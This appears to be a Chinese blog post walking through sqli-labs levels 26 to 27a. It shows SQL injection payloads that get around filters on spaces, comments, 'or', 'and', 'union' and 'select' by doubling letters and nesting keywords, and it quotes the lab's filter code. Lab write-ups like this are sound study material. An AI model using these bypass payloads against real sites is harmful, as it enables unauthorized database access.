sqli labs 6
2016-10-16 14:23
239 查看
1. 题目26
这个题目还可以进行深入的研究一下
1. 题目26a
3.题目27:
4.题目27a:
当id=1时,页面报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 所以我猜测sql语句是:select * from table where id='1' limit 0,1; 通过几次尝试,发现过滤了一些字符,比如:-- ,空格 # or and 考虑过滤了空格则构造的sql语句可以是: id=1'or'1,页面正常显示了,接下来就是考虑如何读取数据库中的数据,接着来构造我们的sql语句: id=1'oORr(select(concat((select(count(id))from(userse)),'')))='123 页面报错,Table 'security.userse' doesn't exist
这个题目还可以进行深入的研究一下
1. 题目26a
查看源代码:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
因为在代码中过滤了一些字符串,or and -- space(空格) # /
经过一些实验表面:-- # 一定会被过滤了
所以重点还是回到了如何构造sql语句而且没有过滤
id=-1')oORr(select(concat((select(count(id))from(users)),'')))>('0
页面正常显示,显示 Your Login name:Dumb
Your Password:Dumb
当id=-1')oORr(select(concat((select(count(id))from(useras)),'')))>('0
页面没有正常显示,就是没有显示Your Password:Dumb
ok,sql注入语句就是:-1')oORr(select(concat((select(count(id))from(useras)),'')))>('03.题目27:
输入id=1,页面正常显示
输入id=1',页面报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''12'' LIMIT 0,1' at line 1
还原sql,语句:select * from table where id='1' limit 0,1;
尝试id=1' or 1=1 #--+
发现代码过滤了空格,和--
我去看一一下源代码,发现过滤了很多字符串:
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
根据过滤了这些字符串,构造sql语句:
id=-1'or(selseselectlectect(count(id))from(users))>'0,页面正常显示,Your Login name:Dumb
Your Password:Dumb
构造id=-1'or(selseselectlectect(count(id))from(users3))>'0,页面显示数据库错误, Table 'security.us3ers' doesn't exist
想要继续获取信息,就接着注入吧!!!4.题目27a:
输入id=1,页面正常显示!!! 输入id=1" 页面显示异常 构造sql语句,id=-1"or(selseselectlectect(count(id))from(users3))>"0,页面显示异常, -1"or(selseselectlectect(count(id))from(users))>"0,页面正常显示。 这一题和上一题很相似,只不过是不显示数据库错误
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- ④sqlilabs的less-3和less-4
- Sqli-labs less 46
- Sqli-labs less 12
- SQLi Labs Lesson22
- SQLi-Labs 学习笔记(Less 1-10)
- sqli labs 4
- sqli labs 5
- SQL注入之手工注入sqli-labs-master
- Sqli-labs less 65
- Sqli-labs less 45
- Sqli-labs less 31
- 【SQL注入之sqli-labs】Less 1 - Less 5 练习笔记
- Sqli-LABS通关笔录-12
- Sqli-labs less 64
- SQL注入练习平台sqli-labs
- Sqli-labs less 44
- Sqli-labs less 29
- Sqli-labs less 9
- SQLi Labs Lesson20
- Sqli-labs学习SQL注入-Lesson 1-10总结